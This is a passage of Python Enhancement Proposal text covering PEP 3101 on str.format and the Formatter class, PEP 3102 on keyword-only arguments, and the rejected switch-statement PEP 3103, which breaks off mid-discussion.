Brace characters (‘curly braces’) are used to indicate a
replacement field within the string:
"My name is {0}".format('Fred')
The result of this is the string:
"My name is Fred"
Braces can be escaped by doubling:
"My name is {0} :-{{}}".format('Fred')
Which would produce:
"My name is Fred :-{}"
The element within the braces is called a ‘field’. Fields consist
of a ‘field name’, which can either be simple or compound, and an
optional ‘format specifier’.
Simple and Compound Field Names
Simple field names are either names or numbers. If numbers, they
must be valid base-10 integers; if names, they must be valid
Python identifiers. A number is used to identify a positional
argument, while a name is used to identify a keyword argument.
A compound field name is a combination of multiple simple field
names in an expression:
"My name is {0.name}".format(open('out.txt', 'w'))
This example shows the use of the ‘getattr’ or ‘dot’ operator
in a field expression. The dot operator allows an attribute of
an input value to be specified as the field value.
Unlike some other programming languages, you cannot embed arbitrary
expressions in format strings. This is by design - the types of
expressions that you can use is deliberately limited. Only two operators
are supported: the ‘.’ (getattr) operator, and the ‘[]’ (getitem)
operator. The reason for allowing these operators is that they don’t
normally have side effects in non-pathological code.
An example of the ‘getitem’ syntax:
"My name is {0[name]}".format(dict(name='Fred'))
It should be noted that the use of ‘getitem’ within a format string
is much more limited than its conventional usage. In the above example,
the string ‘name’ really is the literal string ‘name’, not a variable
named ‘name’. The rules for parsing an item key are very simple.
If it starts with a digit, then it is treated as a number, otherwise
it is used as a string.
Because keys are not quote-delimited, it is not possible to
specify arbitrary dictionary keys (e.g., the strings “10” or
“:-]”) from within a format string.
Implementation note: The implementation of this proposal is
not required to enforce the rule about a simple or dotted name
being a valid Python identifier. Instead, it will rely on the
getattr function of the underlying object to throw an exception if
the identifier is not legal. The str.format() function will have
a minimalist parser which only attempts to figure out when it is
“done” with an identifier (by finding a ‘.’ or a ‘]’, or ‘}’,
etc.).
Format Specifiers
Each field can also specify an optional set of ‘format
specifiers’ which can be used to adjust the format of that field.
Format specifiers follow the field name, with a colon (‘:’)
character separating the two:
"My name is {0:8}".format('Fred')
The meaning and syntax of the format specifiers depends on the
type of object that is being formatted, but there is a standard
set of format specifiers used for any object that does not
override them.
Format specifiers can themselves contain replacement fields.
For example, a field whose field width is itself a parameter
could be specified via:
"{0:{1}}".format(a, b)
These ‘internal’ replacement fields can only occur in the format
specifier part of the replacement field. Internal replacement fields
cannot themselves have format specifiers. This implies also that
replacement fields cannot be nested to arbitrary levels.
Note that the doubled ‘}’ at the end, which would normally be
escaped, is not escaped in this case. The reason is because
the ‘{{’ and ‘}}’ syntax for escapes is only applied when used
outside of a format field. Within a format field, the brace
characters always have their normal meaning.
The syntax for format specifiers is open-ended, since a class
can override the standard format specifiers. In such cases,
the str.format() method merely passes all of the characters between
the first colon and the matching brace to the relevant underlying
formatting method.
Standard Format Specifiers
If an object does not define its own format specifiers, a standard
set of format specifiers is used. These are similar in concept to
the format specifiers used by the existing ‘%’ operator, however
there are also a number of differences.
The general form of a standard format specifier is:
[[fill]align][sign][#][0][minimumwidth][.precision][type]
The brackets ([]) indicate an optional element.
Then the optional align flag can be one of the following:
'<' - Forces the field to be left-aligned within the available
space (This is the default.)
'>' - Forces the field to be right-aligned within the
available space.
'=' - Forces the padding to be placed after the sign (if any)
but before the digits. This is used for printing fields
in the form '+000000120'. This alignment option is only
valid for numeric types.
'^' - Forces the field to be centered within the available
space.
Note that unless a minimum field width is defined, the field
width will always be the same size as the data to fill it, so
that the alignment option has no meaning in this case.
The optional ‘fill’ character defines the character to be used to
pad the field to the minimum width. The fill character, if present,
must be followed by an alignment flag.
The ‘sign’ option is only valid for numeric types, and can be one
of the following:
'+' - indicates that a sign should be used for both
positive as well as negative numbers
'-' - indicates that a sign should be used only for negative
numbers (this is the default behavior)
' ' - indicates that a leading space should be used on
positive numbers
If the ‘#’ character is present, integers use the ‘alternate form’
for formatting. This means that binary, octal, and hexadecimal
output will be prefixed with ‘0b’, ‘0o’, and ‘0x’, respectively.
‘width’ is a decimal integer defining the minimum field width. If
not specified, then the field width will be determined by the
content.
If the width field is preceded by a zero (‘0’) character, this enables
zero-padding. This is equivalent to an alignment type of ‘=’ and a
fill character of ‘0’.
The ‘precision’ is a decimal number indicating how many digits
should be displayed after the decimal point in a floating point
conversion. For non-numeric types the field indicates the maximum
field size - in other words, how many characters will be used from
the field content. The precision is ignored for integer conversions.
Finally, the ‘type’ determines how the data should be presented.
The available integer presentation types are:
'b' - Binary. Outputs the number in base 2.
'c' - Character. Converts the integer to the corresponding
Unicode character before printing.
'd' - Decimal Integer. Outputs the number in base 10.
'o' - Octal format. Outputs the number in base 8.
'x' - Hex format. Outputs the number in base 16, using
lower-case letters for the digits above 9.
'X' - Hex format. Outputs the number in base 16, using
upper-case letters for the digits above 9.
'n' - Number. This is the same as 'd', except that it uses the
current locale setting to insert the appropriate
number separator characters.
'' (None) - the same as 'd'
The available floating point presentation types are:
'e' - Exponent notation. Prints the number in scientific
notation using the letter 'e' to indicate the exponent.
'E' - Exponent notation. Same as 'e' except it converts the
number to uppercase.
'f' - Fixed point. Displays the number as a fixed-point
number.
'F' - Fixed point. Same as 'f' except it converts the number
to uppercase.
'g' - General format. This prints the number as a fixed-point
number, unless the number is too large, in which case
it switches to 'e' exponent notation.
'G' - General format. Same as 'g' except switches to 'E'
if the number gets to large.
'n' - Number. This is the same as 'g', except that it uses the
current locale setting to insert the appropriate
number separator characters.
'%' - Percentage. Multiplies the number by 100 and displays
in fixed ('f') format, followed by a percent sign.
'' (None) - similar to 'g', except that it prints at least one
digit after the decimal point.
Objects are able to define their own format specifiers to
replace the standard ones. An example is the ‘datetime’ class,
whose format specifiers might look something like the
arguments to the strftime() function:
"Today is: {0:%a %b %d %H:%M:%S %Y}".format(datetime.now())
For all built-in types, an empty format specification will produce
the equivalent of str(value). It is recommended that objects
defining their own format specifiers follow this convention as
well.
Explicit Conversion Flag
The explicit conversion flag is used to transform the format field value
before it is formatted. This can be used to override the type-specific
formatting behavior, and format the value as if it were a more
generic type. Currently, two explicit conversion flags are
recognized:
!r - convert the value to a string using repr().
!s - convert the value to a string using str().
These flags are placed before the format specifier:
"{0!r:20}".format("Hello")
In the preceding example, the string “Hello” will be printed, with quotes,
in a field of at least 20 characters width.
A custom Formatter class can define additional conversion flags.
The built-in formatter will raise a ValueError if an invalid
conversion flag is specified.
Controlling Formatting on a Per-Type Basis
Each Python type can control formatting of its instances by defining
a __format__ method. The __format__ method is responsible for
interpreting the format specifier, formatting the value, and
returning the resulting string.
The new, global built-in function ‘format’ simply calls this special
method, similar to how len() and str() simply call their respective
special methods:
def format(value, format_spec):
return value.__format__(format_spec)
It is safe to call this function with a value of “None” (because the
“None” value in Python is an object and can have methods.)
Several built-in types, including ‘str’, ‘int’, ‘float’, and ‘object’
define __format__ methods. This means that if you derive from any of
those types, your class will know how to format itself.
The object.__format__ method is the simplest: It simply converts the
object to a string, and then calls format again:
class object:
def __format__(self, format_spec):
return format(str(self), format_spec)
The __format__ methods for ‘int’ and ‘float’ will do numeric formatting
based on the format specifier. In some cases, these formatting
operations may be delegated to other types. So for example, in the case
where the ‘int’ formatter sees a format type of ‘f’ (meaning ‘float’)
it can simply cast the value to a float and call format() again.
Any class can override the __format__ method to provide custom
formatting for that type:
class AST:
def __format__(self, format_spec):
...
Note for Python 2.x: The ‘format_spec’ argument will be either
a string object or a unicode object, depending on the type of the
original format string. The __format__ method should test the type
of the specifiers parameter to determine whether to return a string or
unicode object. It is the responsibility of the __format__ method
to return an object of the proper type.
Note that the ‘explicit conversion’ flag mentioned above is not passed
to the __format__ method. Rather, it is expected that the conversion
specified by the flag will be performed before calling __format__.
User-Defined Formatting
There will be times when customizing the formatting of fields
on a per-type basis is not enough. An example might be a
spreadsheet application, which displays hash marks ‘#’ when a value
is too large to fit in the available space.
For more powerful and flexible formatting, access to the underlying
format engine can be obtained through the ‘Formatter’ class that
lives in the ‘string’ module. This class takes additional options
which are not accessible via the normal str.format method.
An application can subclass the Formatter class to create its own
customized formatting behavior.
The PEP does not attempt to exactly specify all methods and
properties defined by the Formatter class; instead, those will be
defined and documented in the initial implementation. However, this
PEP will specify the general requirements for the Formatter class,
which are listed below.
Although string.format() does not directly use the Formatter class
to do formatting, both use the same underlying implementation. The
reason that string.format() does not use the Formatter class directly
is because “string” is a built-in type, which means that all of its
methods must be implemented in C, whereas Formatter is a Python
class. Formatter provides an extensible wrapper around the same
C functions as are used by string.format().
Formatter Methods
The Formatter class takes no initialization arguments:
fmt = Formatter()
The public API methods of class Formatter are as follows:
-- format(format_string, *args, **kwargs)
-- vformat(format_string, args, kwargs)
‘format’ is the primary API method. It takes a format template,
and an arbitrary set of positional and keyword arguments.
‘format’ is just a wrapper that calls ‘vformat’.
‘vformat’ is the function that does the actual work of formatting. It
is exposed as a separate function for cases where you want to pass in
a predefined dictionary of arguments, rather than unpacking and
repacking the dictionary as individual arguments using the *args and
**kwds syntax. ‘vformat’ does the work of breaking up the format
template string into character data and replacement fields. It calls
the ‘get_positional’ and ‘get_index’ methods as appropriate (described
below.)
Formatter defines the following overridable methods:
-- get_value(key, args, kwargs)
-- check_unused_args(used_args, args, kwargs)
-- format_field(value, format_spec)
‘get_value’ is used to retrieve a given field value. The ‘key’ argument
will be either an integer or a string. If it is an integer, it represents
the index of the positional argument in ‘args’; If it is a string, then
it represents a named argument in ‘kwargs’.
The ‘args’ parameter is set to the list of positional arguments to
‘vformat’, and the ‘kwargs’ parameter is set to the dictionary of
positional arguments.
For compound field names, these functions are only called for the
first component of the field name; subsequent components are handled
through normal attribute and indexing operations.
So for example, the field expression ‘0.name’ would cause ‘get_value’
to be called with a ‘key’ argument of 0. The ‘name’ attribute will be
looked up after ‘get_value’ returns by calling the built-in ‘getattr’
function.
If the index or keyword refers to an item that does not exist, then an
IndexError/KeyError should be raised.
‘check_unused_args’ is used to implement checking for unused arguments
if desired. The arguments to this function is the set of all argument
keys that were actually referred to in the format string (integers for
positional arguments, and strings for named arguments), and a reference
to the args and kwargs that was passed to vformat. The set of unused
args can be calculated from these parameters. ‘check_unused_args’
is assumed to throw an exception if the check fails.
‘format_field’ simply calls the global ‘format’ built-in. The method
is provided so that subclasses can override it.
To get a better understanding of how these functions relate to each
other, here is pseudocode that explains the general operation of
vformat:
def vformat(format_string, args, kwargs):
# Output buffer and set of used args
buffer = StringIO.StringIO()
used_args = set()
# Tokens are either format fields or literal strings
for token in self.parse(format_string):
if is_format_field(token):
# Split the token into field value and format spec
field_spec, _, format_spec = token.partition(":")
# Check for explicit type conversion
explicit, _, field_spec = field_spec.rpartition("!")
# 'first_part' is the part before the first '.' or '['
# Assume that 'get_first_part' returns either an int or
# a string, depending on the syntax.
first_part = get_first_part(field_spec)
value = self.get_value(first_part, args, kwargs)
# Record the fact that we used this arg
used_args.add(first_part)
# Handle [subfield] or .subfield. Assume that 'components'
# returns an iterator of the various subfields, not including
# the first part.
for comp in components(field_spec):
value = resolve_subfield(value, comp)
# Handle explicit type conversion
if explicit == 'r':
value = repr(value)
elif explicit == 's':
value = str(value)
# Call the global 'format' function and write out the converted
# value.
buffer.write(self.format_field(value, format_spec))
else:
buffer.write(token)
self.check_unused_args(used_args, args, kwargs)
return buffer.getvalue()
Note that the actual algorithm of the Formatter class (which will be
implemented in C) may not be the one presented here. (It’s likely
that the actual implementation won’t be a ‘class’ at all - rather,
vformat may just call a C function which accepts the other overridable
methods as arguments.) The primary purpose of this code example is to
illustrate the order in which overridable methods are called.
Customizing Formatters
This section describes some typical ways that Formatter objects
can be customized.
To support alternative format-string syntax, the ‘vformat’ method
can be overridden to alter the way format strings are parsed.
One common desire is to support a ‘default’ namespace, so that
you don’t need to pass in keyword arguments to the format()
method, but can instead use values in a pre-existing namespace.
This can easily be done by overriding get_value() as follows:
class NamespaceFormatter(Formatter):
def __init__(self, namespace={}):
Formatter.__init__(self)
self.namespace = namespace
def get_value(self, key, args, kwds):
if isinstance(key, str):
try:
# Check explicitly passed arguments first
return kwds[key]
except KeyError:
return self.namespace[key]
else:
Formatter.get_value(key, args, kwds)
One can use this to easily create a formatting function that allows
access to global variables, for example:
fmt = NamespaceFormatter(globals())
greeting = "hello"
print(fmt.format("{greeting}, world!"))
A similar technique can be done with the locals() dictionary to
gain access to the locals dictionary.
It would also be possible to create a ‘smart’ namespace formatter
that could automatically access both locals and globals through
snooping of the calling stack. Due to the need for compatibility
with the different versions of Python, such a capability will not
be included in the standard library, however it is anticipated
that someone will create and publish a recipe for doing this.
Another type of customization is to change the way that built-in
types are formatted by overriding the ‘format_field’ method. (For
non-built-in types, you can simply define a __format__ special
method on that type.) So for example, you could override the
formatting of numbers to output scientific notation when needed.
Error handling
There are two classes of exceptions which can occur during formatting:
exceptions generated by the formatter code itself, and exceptions
generated by user code (such as a field object’s ‘getattr’ function).
In general, exceptions generated by the formatter code itself are
of the “ValueError” variety – there is an error in the actual “value”
of the format string. (This is not always true; for example, the
string.format() function might be passed a non-string as its first
parameter, which would result in a TypeError.)
The text associated with these internally generated ValueError
exceptions will indicate the location of the exception inside
the format string, as well as the nature of the exception.
For exceptions generated by user code, a trace record and
dummy frame will be added to the traceback stack to help
in determining the location in the string where the exception
occurred. The inserted traceback will indicate that the
error occurred at:
File "<format_string>;", line XX, in column_YY
where XX and YY represent the line and character position
information in the string, respectively.
Alternate Syntax
Naturally, one of the most contentious issues is the syntax of the
format strings, and in particular the markup conventions used to
indicate fields.
Rather than attempting to exhaustively list all of the various
proposals, I will cover the ones that are most widely used
already.
Shell variable syntax: $name and $(name) (or in some variants,
${name}). This is probably the oldest convention out there, and
is used by Perl and many others. When used without the braces,
the length of the variable is determined by lexically scanning
until an invalid character is found.This scheme is generally used in cases where interpolation is
implicit - that is, in environments where any string can contain
interpolation variables, and no special substitution function
need be invoked. In such cases, it is important to prevent the
interpolation behavior from occurring accidentally, so the ‘$’
(which is otherwise a relatively uncommonly-used character) is
used to signal when the behavior should occur.
It is the author’s opinion, however, that in cases where the
formatting is explicitly invoked, that less care needs to be
taken to prevent accidental interpolation, in which case a
lighter and less unwieldy syntax can be used.
printf and its cousins (‘%’), including variations that add a
field index, so that fields can be interpolated out of order.
Other bracket-only variations. Various MUDs (Multi-User
Dungeons) such as MUSH have used brackets (e.g. [name]) to do
string interpolation. The Microsoft .Net libraries uses braces
({}), and a syntax which is very similar to the one in this
proposal, although the syntax for format specifiers is quite
different. [4]
Backquoting. This method has the benefit of minimal syntactical
clutter, however it lacks many of the benefits of a function
call syntax (such as complex expression arguments, custom
formatters, etc.).
Other variations include Ruby’s #{}, PHP’s {$name}, and so
on.
Some specific aspects of the syntax warrant additional comments:
1) Backslash character for escapes. The original version of
this PEP used backslash rather than doubling to escape a bracket.
This worked because backslashes in Python string literals that
don’t conform to a standard backslash sequence such as \n
are left unmodified. However, this caused a certain amount
of confusion, and led to potential situations of multiple
recursive escapes, i.e. \\\\{ to place a literal backslash
in front of a bracket.
2) The use of the colon character (‘:’) as a separator for
format specifiers. This was chosen simply because that’s
what .Net uses.
Alternate Feature Proposals
Restricting attribute access: An earlier version of the PEP
restricted the ability to access attributes beginning with a
leading underscore, for example “{0}._private”. However, this
is a useful ability to have when debugging, so the feature
was dropped.
Some developers suggested that the ability to do ‘getattr’ and
‘getitem’ access should be dropped entirely. However, this
is in conflict with the needs of another set of developers who
strongly lobbied for the ability to pass in a large dict as a
single argument (without flattening it into individual keyword
arguments using the **kwargs syntax) and then have the format
string refer to dict entries individually.
There has also been suggestions to expand the set of expressions
that are allowed in a format string. However, this was seen
to go against the spirit of TOOWTDI, since the same effect can
be achieved in most cases by executing the same expression on
the parameter before it’s passed in to the formatting function.
For cases where the format string is being use to do arbitrary
formatting in a data-rich environment, it’s recommended to use
a template engine specialized for this purpose, such as
Genshi [5] or Cheetah [6].
Many other features were considered and rejected because they
could easily be achieved by subclassing Formatter instead of
building the feature into the base implementation. This includes
alternate syntax, comments in format strings, and many others.
Security Considerations
Historically, string formatting has been a common source of
security holes in web-based applications, particularly if the
string formatting system allows arbitrary expressions to be
embedded in format strings.
The best way to use string formatting in a way that does not
create potential security holes is to never use format strings
that come from an untrusted source.
Barring that, the next best approach is to ensure that string
formatting has no side effects. Because of the open nature of
Python, it is impossible to guarantee that any non-trivial
operation has this property. What this PEP does is limit the
types of expressions in format strings to those in which visible
side effects are both rare and strongly discouraged by the
culture of Python developers. So for example, attribute access
is allowed because it would be considered pathological to write
code where the mere access of an attribute has visible side
effects (whether the code has invisible side effects - such
as creating a cache entry for faster lookup - is irrelevant.)
Sample Implementation
An implementation of an earlier version of this PEP was created by
Patrick Maupin and Eric V. Smith, and can be found in the pep3101
sandbox at:
http://svn.python.org/view/sandbox/trunk/pep3101/
Backwards Compatibility
Backwards compatibility can be maintained by leaving the existing
mechanisms in place. The new system does not collide with any of
the method names of the existing string formatting techniques, so
both systems can co-exist until it comes time to deprecate the
older system.
References
[1]
Python Library Reference - String formatting operations
http://docs.python.org/library/stdtypes.html#string-formatting-operations
[2]
Python Library References - Template strings
http://docs.python.org/library/string.html#string.Template
[3]
[Python-3000] String formatting operations in python 3k
https://mail.python.org/pipermail/python-3000/2006-April/000285.html
[4]
Composite Formatting - [.Net Framework Developer’s Guide]
http://msdn.microsoft.com/library/en-us/cpguide/html/cpconcompositeformatting.asp?frame=true
[5]
Genshi templating engine.
http://genshi.edgewall.org/
[6]
Cheetah - The Python-Powered Template Engine.
http://www.cheetahtemplate.org/
Copyright
This document has been placed in the public domain.
| Final | PEP 3101 – Advanced String Formatting | Standards Track | This PEP proposes a new system for built-in string formatting
operations, intended as a replacement for the existing ‘%’ string
formatting operator. |
PEP 3102 – Keyword-Only Arguments
Author:
Talin <viridia at gmail.com>
Status:
Final
Type:
Standards Track
Created:
22-Apr-2006
Python-Version:
3.0
Post-History:
28-Apr-2006, 19-May-2006
Table of Contents
Abstract
Rationale
Specification
Function Calling Behavior
Backwards Compatibility
Copyright
Abstract
This PEP proposes a change to the way that function arguments are
assigned to named parameter slots. In particular, it enables the
declaration of “keyword-only” arguments: arguments that can only
be supplied by keyword and which will never be automatically
filled in by a positional argument.
Rationale
The current Python function-calling paradigm allows arguments to
be specified either by position or by keyword. An argument can be
filled in either explicitly by name, or implicitly by position.
There are often cases where it is desirable for a function to take
a variable number of arguments. The Python language supports this
using the ‘varargs’ syntax (*name), which specifies that any
‘left over’ arguments be passed into the varargs parameter as a
tuple.
One limitation on this is that currently, all of the regular
argument slots must be filled before the vararg slot can be.
This is not always desirable. One can easily envision a function
which takes a variable number of arguments, but also takes one
or more ‘options’ in the form of keyword arguments. Currently,
the only way to do this is to define both a varargs argument,
and a ‘keywords’ argument (**kwargs), and then manually extract
the desired keywords from the dictionary.
Specification
Syntactically, the proposed changes are fairly simple. The first
change is to allow regular arguments to appear after a varargs
argument:
def sortwords(*wordlist, case_sensitive=False):
...
This function accepts any number of positional arguments, and it
also accepts a keyword option called ‘case_sensitive’. This
option will never be filled in by a positional argument, but
must be explicitly specified by name.
Keyword-only arguments are not required to have a default value.
Since Python requires that all arguments be bound to a value,
and since the only way to bind a value to a keyword-only argument
is via keyword, such arguments are therefore ‘required keyword’
arguments. Such arguments must be supplied by the caller, and
they must be supplied via keyword.
The second syntactical change is to allow the argument name to
be omitted for a varargs argument. The meaning of this is to
allow for keyword-only arguments for functions that would not
otherwise take a varargs argument:
def compare(a, b, *, key=None):
...
The reasoning behind this change is as follows. Imagine for a
moment a function which takes several positional arguments, as
well as a keyword argument:
def compare(a, b, key=None):
...
Now, suppose you wanted to have ‘key’ be a keyword-only argument.
Under the above syntax, you could accomplish this by adding a
varargs argument immediately before the keyword argument:
def compare(a, b, *ignore, key=None):
...
Unfortunately, the ‘ignore’ argument will also suck up any
erroneous positional arguments that may have been supplied by the
caller. Given that we’d prefer any unwanted arguments to raise an
error, we could do this:
def compare(a, b, *ignore, key=None):
if ignore: # If ignore is not empty
raise TypeError
As a convenient shortcut, we can simply omit the ‘ignore’ name,
meaning ‘don’t allow any positional arguments beyond this point’.
(Note: After much discussion of alternative syntax proposals, the
BDFL has pronounced in favor of this ‘single star’ syntax for
indicating the end of positional parameters.)
Function Calling Behavior
The previous section describes the difference between the old
behavior and the new. However, it is also useful to have a
description of the new behavior that stands by itself, without
reference to the previous model. So this next section will
attempt to provide such a description.
When a function is called, the input arguments are assigned to
formal parameters as follows:
For each formal parameter, there is a slot which will be used
to contain the value of the argument assigned to that
parameter.
Slots which have had values assigned to them are marked as
‘filled’. Slots which have no value assigned to them yet are
considered ‘empty’.
Initially, all slots are marked as empty.
Positional arguments are assigned first, followed by keyword
arguments.
For each positional argument:
Attempt to bind the argument to the first unfilled
parameter slot. If the slot is not a vararg slot, then
mark the slot as ‘filled’.
If the next unfilled slot is a vararg slot, and it does
not have a name, then it is an error.
Otherwise, if the next unfilled slot is a vararg slot then
all remaining non-keyword arguments are placed into the
vararg slot.
For each keyword argument:
If there is a parameter with the same name as the keyword,
then the argument value is assigned to that parameter slot.
However, if the parameter slot is already filled, then that
is an error.
Otherwise, if there is a ‘keyword dictionary’ argument,
the argument is added to the dictionary using the keyword
name as the dictionary key, unless there is already an
entry with that key, in which case it is an error.
Otherwise, if there is no keyword dictionary, and no
matching named parameter, then it is an error.
Finally:
If the vararg slot is not yet filled, assign an empty tuple
as its value.
For each remaining empty slot: if there is a default value
for that slot, then fill the slot with the default value.
If there is no default value, then it is an error.
In accordance with the current Python implementation, any errors
encountered will be signaled by raising TypeError. (If you want
something different, that’s a subject for a different PEP.)
Backwards Compatibility
The function calling behavior specified in this PEP is a superset
of the existing behavior - that is, it is expected that any
existing programs will continue to work.
Copyright
This document has been placed in the public domain.
| Final | PEP 3102 – Keyword-Only Arguments | Standards Track | This PEP proposes a change to the way that function arguments are
assigned to named parameter slots. In particular, it enables the
declaration of “keyword-only” arguments: arguments that can only
be supplied by keyword and which will never be automatically
filled in by a positional argument. |
PEP 3103 – A Switch/Case Statement
Author:
Guido van Rossum <guido at python.org>
Status:
Rejected
Type:
Standards Track
Created:
25-Jun-2006
Python-Version:
3.0
Post-History:
26-Jun-2006
Table of Contents
Rejection Notice
Abstract
Rationale
Basic Syntax
Alternative 1
Alternative 2
Alternative 3
Alternative 4
Extended Syntax
Alternative A
Alternative B
Alternative C
Alternative D
Discussion
Semantics
If/Elif Chain vs. Dict-based Dispatch
When to Freeze the Dispatch Dict
Option 1
Option 2
Option 3
Option 4
Conclusion
Copyright
Rejection Notice
A quick poll during my keynote presentation at PyCon 2007 shows this
proposal has no popular support. I therefore reject it.
Abstract
Python-dev has recently seen a flurry of discussion on adding a switch
statement. In this PEP I’m trying to extract my own preferences from
the smorgasbord of proposals, discussing alternatives and explaining
my choices where I can. I’ll also indicate how strongly I feel about
alternatives I discuss.
This PEP should be seen as an alternative to PEP 275. My views are
somewhat different from that PEP’s author, but I’m grateful for the
work done in that PEP.
This PEP introduces canonical names for the many variants that have
been discussed for different aspects of the syntax and semantics, such
as “alternative 1”, “school II”, “option 3” and so on. Hopefully
these names will help the discussion.
Rationale
A common programming idiom is to consider an expression and do
different things depending on its value. This is usually done with a
chain of if/elif tests; I’ll refer to this form as the “if/elif
chain”. There are two main motivations to want to introduce new
syntax for this idiom:
It is repetitive: the variable and the test operator, usually ‘==’
or ‘in’, are repeated in each if/elif branch.
It is inefficient: when an expression matches the last test value
(or no test value at all) it is compared to each of the preceding
test values.
Both of these complaints are relatively mild; there isn’t a lot of
readability or performance to be gained by writing this differently.
Yet, some kind of switch statement is found in many languages and it
is not unreasonable to expect that its addition to Python will allow
us to write up certain code more cleanly and efficiently than before.
There are forms of dispatch that are not suitable for the proposed
switch statement; for example, when the number of cases is not
statically known, or when it is desirable to place the code for
different cases in different classes or files.
Basic Syntax
I’m considering several variants of the syntax first proposed in PEP
275 here. There are lots of other possibilities, but I don’t see that
they add anything.
I’ve recently been converted to alternative 1.
I should note that all alternatives here have the “implicit break”
property: at the end of the suite for a particular case, the control
flow jumps to the end of the whole switch statement. There is no way
to pass control from one case to another. This in contrast to C,
where an explicit ‘break’ statement is required to prevent falling
through to the next case.
In all alternatives, the else-suite is optional. It is more Pythonic
to use ‘else’ here rather than introducing a new reserved word,
‘default’, as in C.
Semantics are discussed in the next top-level section.
Alternative 1
This is the preferred form in PEP 275:
switch EXPR:
case EXPR:
SUITE
case EXPR:
SUITE
...
else:
SUITE
The main downside is that the suites where all the action is are
indented two levels deep; this can be remedied by indenting the cases
“half a level” (e.g. 2 spaces if the general indentation level is 4).
Alternative 2
This is Fredrik Lundh’s preferred form; it differs by not indenting
the cases:
switch EXPR:
case EXPR:
SUITE
case EXPR:
SUITE
....
else:
SUITE
Some reasons not to choose this include expected difficulties for
auto-indenting editors, folding editors, and the like; and confused
users. There are no situations currently in Python where a line
ending in a colon is followed by an unindented line.
Alternative 3
This is the same as alternative 2 but leaves out the colon after the
switch:
switch EXPR
case EXPR:
SUITE
case EXPR:
SUITE
....
else:
SUITE
The hope of this alternative is that it will not upset the auto-indent
logic of the average Python-aware text editor less. But it looks
strange to me.
Alternative 4
This leaves out the ‘case’ keyword on the basis that it is redundant:
switch EXPR:
EXPR:
SUITE
EXPR:
SUITE
...
else:
SUITE
Unfortunately now we are forced to indent the case expressions,
because otherwise (at least in the absence of an ‘else’ keyword) the
parser would have a hard time distinguishing between an unindented
case expression (which continues the switch statement) or an unrelated
statement that starts like an expression (such as an assignment or a
procedure call). The parser is not smart enough to backtrack once it
sees the colon. This is my least favorite alternative.
Extended Syntax
There is one additional concern that needs to be addressed
syntactically. Often two or more values need to be treated the same.
In C, this done by writing multiple case labels together without any
code between them. The “fall through” semantics then mean that these
are all handled by the same code. Since the Python switch will not
have fall-through semantics (which have yet to find a champion) we
need another solution. Here are some alternatives.
Alternative A
Use:
case EXPR:
to match on a single expression; use:
case EXPR, EXPR, ...:
to match on multiple expressions. The is interpreted so that if EXPR
is a parenthesized tuple or another expression whose value is a tuple,
the switch expression must equal that tuple, not one of its elements.
This means that we cannot use a variable to indicate multiple cases.
While this is also true in C’s switch statement, it is a relatively
common occurrence in Python (see for example sre_compile.py).
Alternative B
Use:
case EXPR:
to match on a single expression; use:
case in EXPR_LIST:
to match on multiple expressions. If EXPR_LIST is a single
expression, the ‘in’ forces its interpretation as an iterable (or
something supporting __contains__, in a minority semantics
alternative). If it is multiple expressions, each of those is
considered for a match.
Alternative C
Use:
case EXPR:
to match on a single expression; use:
case EXPR, EXPR, ...:
to match on multiple expressions (as in alternative A); and use:
case *EXPR:
to match on the elements of an expression whose value is an iterable.
The latter two cases can be combined, so that the true syntax is more
like this:
case [*]EXPR, [*]EXPR, ...:
The * notation is similar to the use of prefix * already in use for
variable-length parameter lists and for passing computed argument
lists, and often proposed for value-unpacking (e.g. a, b, *c = X as
an alternative to (a, b), c = X[:2], X[2:]).
Alternative D
This is a mixture of alternatives B and C; the syntax is like
alternative B but instead of the ‘in’ keyword it uses ‘*’. This is
more limited, but still allows the same flexibility. It uses:
case EXPR:
to match on a single expression and:
case *EXPR:
to match on the elements of an iterable. If one wants to specify
multiple matches in one case, one can write this:
case *(EXPR, EXPR, ...):
or perhaps this (although it’s a bit strange because the relative
priority of ‘*’ and ‘,’ is different than elsewhere):
case * EXPR, EXPR, ...:
Discussion
Alternatives B, C and D are motivated by the desire to specify
multiple cases with the same treatment using a variable representing a
set (usually a tuple) rather than spelling them out. The motivation
for this is usually that if one has several switches over the same set
of cases it’s a shame to have to spell out all the alternatives each
time. An additional motivation is to be able to specify ranges to
be matched easily and efficiently, similar to Pascal’s “1..1000:”
notation. At the same time we want to prevent the kind of mistake
that is common in exception handling (and which will be addressed in
Python 3000 by changing the syntax of the except clause): writing
“case 1, 2:” where “case (1, 2):” was meant, or vice versa.
The case could be made that the need is insufficient for the added
complexity; C doesn’t have a way to express ranges either, and it’s
used a lot more than Pascal these days. Also, if a dispatch method
based on dict lookup is chosen as the semantics, large ranges could be
inefficient (consider range(1, sys.maxint)).
All in all my preferences are (from most to least favorite) B, A, D’,
C, where D’ is D without the third possibility.
Semantics
There are several issues to review before we can choose the right
semantics.
If/Elif Chain vs. Dict-based Dispatch
There are several main schools of thought about the switch statement’s
semantics:
School I wants to define the switch statement in term of an
equivalent if/elif chain (possibly with some optimization thrown
in).
School II prefers to think of it as a dispatch on a precomputed
dict. There are different choices for when the precomputation
happens.
There’s also school III, which agrees with school I that the
definition of a switch statement should be in terms of an equivalent
if/elif chain, but concedes to the optimization camp that all
expressions involved must be hashable.
We need to further separate school I into school Ia and school Ib:
School Ia has a simple position: a switch statement is translated to
an equivalent if/elif chain, and that’s that. It should not be
linked to optimization at all. That is also my main objection
against this school: without any hint of optimization, the switch
statement isn’t attractive enough to warrant new syntax.
School Ib has a more complex position: it agrees with school II that
optimization is important, and is willing to concede the compiler
certain liberties to allow this. (For example, PEP 275 Solution 1.)
In particular, hash() of the switch and case expressions may or may
not be called (so it should be side-effect-free); and the case
expressions may not be evaluated each time as expected by the
if/elif chain behavior, so the case expressions should also be
side-effect free. My objection to this (elaborated below) is that
if either the hash() or the case expressions aren’t
side-effect-free, optimized and unoptimized code may behave
differently.
School II grew out of the realization that optimization of commonly
found cases isn’t so easy, and that it’s better to face this head on.
This will become clear below.
The differences between school I (mostly school Ib) and school II are
threefold:
When optimizing using a dispatch dict, if either the switch
expression or the case expressions are unhashable (in which case
hash() raises an exception), school Ib requires catching the hash()
failure and falling back to an if/elif chain. School II simply lets
the exception happen. The problem with catching an exception in
hash() as required by school Ib, is that this may hide a genuine
bug. A possible way out is to only use a dispatch dict if all case
expressions are ints, strings or other built-ins with known good
hash behavior, and to only attempt to hash the switch expression if
it is also one of those types. Type objects should probably also be
supported here. This is the (only) problem that school III
addresses.
When optimizing using a dispatch dict, if the hash() function of any
expression involved returns an incorrect value, under school Ib,
optimized code will not behave the same as unoptimized code. This
is a well-known problem with optimization-related bugs, and waste
